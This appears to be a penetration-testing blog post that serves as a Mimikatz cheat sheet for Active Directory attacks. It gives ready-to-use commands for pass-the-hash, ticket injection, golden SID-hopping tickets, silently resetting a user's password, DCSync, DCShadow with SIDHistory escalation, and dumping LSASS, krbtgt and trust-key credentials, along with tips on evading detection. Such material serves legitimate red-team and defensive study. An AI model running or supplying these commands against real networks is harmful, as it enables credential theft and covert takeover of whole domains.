Using Mimikatz

Using Mimikatz


Mimikatz can perform the well-known operation “OverPass-The-Hash” to run a process under the security context of another account’s credentials.

This is extremely powerful and should not be underestimated. Behind the scenes, Mimikatz requests a Kerberos ticket from the domain controller using the NTLM hash provided. The Kerberos ticket allows authentication to Kerberos services within the domain (e.g. use sekurlsa::pth to start PowerShell and you can perform lateral movement like PsExec, WMI, WinRM, etc without needing to know the plaintext password).

OverPass-the-Hash can be used to impersonate a machine account which has interesting use case scenarios (see The blog talks about a scenario where they compromised a machine and had captured the machine account NTLM hash. The machine was later taken offline but found to be the only path to Domain Admin. The solution was to use sekurlsa::pth to impersonate the machine account and perform the required operations.

sekurlsa::pth /user:manager /domain:chaos.local /ntlm:FFB91205A3D288362D86C529728B9DC0 /run:powershell
sekurlsa::pth /user:WIN2008R2$ /domain:chaos.local /ntlm:FFB91205A3D288362D86C529728B9DC0 /run:powershell


After a Kerberos ticket is found, it can be copied to another system and passed into the current logon session effectively simulating a logon without any communication with the Domain Controller. No special privileges are required.

/filename – the ticket’s filename (can be multiple)
/diretory – a directory path, all .kirbi files inside will be injected.
kerberos::ppt /filename:“theTicket.kirbi” OR kerberos::ppt /directory:"C:"

Kerberos Golden SID-Hopping Ticket

Once a single Domain Controller (specifically krbtgt hash) is compromised within a forest, you have compromised the entire forest. Mimikatz can be used to create a SID-Hopping Golden ticket to authenticate to all domains within the forest.

/user: Any user in the child domain 
/domain: Child domain FQDN 
/sid: SID of the child domain 
/krbtgt: KRBTGT hash for the child domain 
/sids: SID of enterprise admins group 
/ptt Optional: load the ticket into the current session 
kerberos::golden /user:manager / /sid:S-1-5-21-3702248245-3669926273-3383077842 /krbtgt:FFB91205A3D288362D86C529728B9DC0 /sids:S-1-5-21-2244208837-681476370-1982983775-519 /ptt

ChangeNTLM (Updating Passwords)

There are rare scenarios where you know a user’s NTLM hash and need their password but are unable to crack the NTLM hash. You can change the user’s password to a value you control, and then change it back without them knowing using Mimikatz. This can also be useful when you compromise an account with an expired password. The Mimikatz change be used to update the password without elevated privileges. Use the command net user $username /domain to check if the account has change password privileges (almost always) and if they have changed their password since compromising the NTLM hash.

lsadump::changentlm /server:dc.lab.local /user:sample [/oldntlm OR /oldpassword] [/newntlm OR /newpassword] 
lsadump::changentlm /server:dc.lab.local /user:sample /oldntlm:FFB91205A3D288362D86C529728B9DC0 /newpassword:kiwi 
lsadump::changentlm /server:dc.lab.local /user:sample /oldpassword:kiwi /newntlm:FFB91205A3D288362D86C529728B9DC0


Use replication privileges (domain admins have this by default) to synchronise any accounts credential material (including the NTLM hash).

lsadump::dcsync /domain:chaos.local /user:CHAOS\\Administrator
lsadump::dcsync /domain:chaos.local /all /csv

Download an object using its GUID

Dumping Trust Keys using DCSync
Get-ADObject -LDAPFilter ('objectClass=trustedDomain') | Select name,objectguid lsadump::dcsync /guid:{aaa17f7f-715d-4e99-b613-1d9ae7ffee0f}


DCShadow allows the modification, creation and deletion of objects, object metadata and schema without any logging. See:

lsadump::dcshadow /object:"whatever" /attribute:"" /value:"" 
lsadump::dcshadow /object:CN=Administrator,CN=Users,DC=JEFFLAB,DC=local /attribute:description /value:"DCShadow was here!" 
lsadump::dcshadow /push ## SIDHistory Very useful, also mentioned in the DCShadow presentation. Set the SIDHistory of an account to a high privilege one like DA or EA group and we are all set for highest privileges without having to modify any Group Membership or ACL.

lsadump::dcshadow /object:helpdeskuser /attribute:SIDHistory /value:S-1-5-21-3270384115-3177237293-604223748-519


This is a legacy protocol and should only really be used when you think DCSync will get detected. NetSync is more limited in comparison to DCSync in that it only allows synchronising machine accounts and only accepts machine accounts to perform the operations.

lsadump::netsync /dc:chaos.local /user:dc$ /ntlm:FFB91205A3D288362D86C529728B9DC0 /account:DESKTOP-WARDOG$

Log Credentials to File (Bypassing Credential Guard)


Credentials are written to the file C:\\Windows\\System32\\mimilsa.log.

Dump Passwords (Memory and Registry)

The sekurlsa::logonpasswords module will list all available credential material in all default Microsoft Windows credential providers. This includes msv, wdigest, tspkg, ssp, credman, ekeys, etc. Mimikatz cannot dump credential material stored in custom credential providers as the memory offsets will not be known.


NTLM hashes can be used to perform PTH attacks and authenticate to services supported NTLM authenticating. It can also be used to request a Kerberos ticket for Kerberos services. The most common scenarios include PsExec, WMI and WinRM. From Memory Dump:

sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords full

Dump Domain Controller Credentials

Ask LSA Server to retrieve SAM/AD enterprise (normal, patch on the fly or inject). Use /patch for a subset of data, use /inject for everything. Requires System or Debug rights on a Domain Controller. The /patch method should be considered more OPSEC safe. See:

Don’t specify a name to dump all hashes

lsadump::lsa /inject /name:krbtgt
lsadump::lsa /patch /name:krbtgt

Dump Domain Controller Trust Keys

Extracts data from Active Directory for existing trust relationships for the domain. The trust key (password) is displayed as well.

lsadump::trust /patch

More Blogs

May 31, 2021

Upgrading from AppLocker to Windows Defender Application Control (WDAC)

Windows Defender Application Control (WDAC), formerly known as Device Guard, is a Microsoft Windows secure feature that restricts executable code, including scripts run by enlightened Windows script hosts, to those that conform to the device code integrity policy. WDAC prevents the execution, loading and running of unwanted or malicious code, drivers and scripts. WDAC also… Continue reading Upgrading from AppLocker to Windows Defender Application Control (WDAC)

Read More
cyber security companies | penetration testing | managed security service provider | cyber security consultant
June 22, 2021

Bypassing LSA Protection (aka Protected Process Light) without Mimikatz on Windows 10

Starting with Windows 8.1 (and Server 2012 R2) Microsoft introduced a feature termed LSA Protection. This feature is based on the Protected Process Light (PPL) technology which is a defense-in-depth security feature that is designed to “prevent non-administrative non-PPL processes from accessing or tampering with code and data in a PPL process via open process… Continue reading Bypassing LSA Protection (aka Protected Process Light) without Mimikatz on Windows 10

Read More
cyber security companies | penetration testing | managed security service provider | cyber security consultant
June 7, 2020

Using Zeek to detect exploitation of Citrix CVE-2019-19781

Using the tool Zeek, formally known as bro, is a high-level packet analysis program. It originally began development in the 1990s and has a long history. It does not directly intercept or modify traffic, rather it passively observes it and creates high-level network logs. It can be used in conjunction with a SIEM to allow… Continue reading Using Zeek to detect exploitation of Citrix CVE-2019-19781

Read More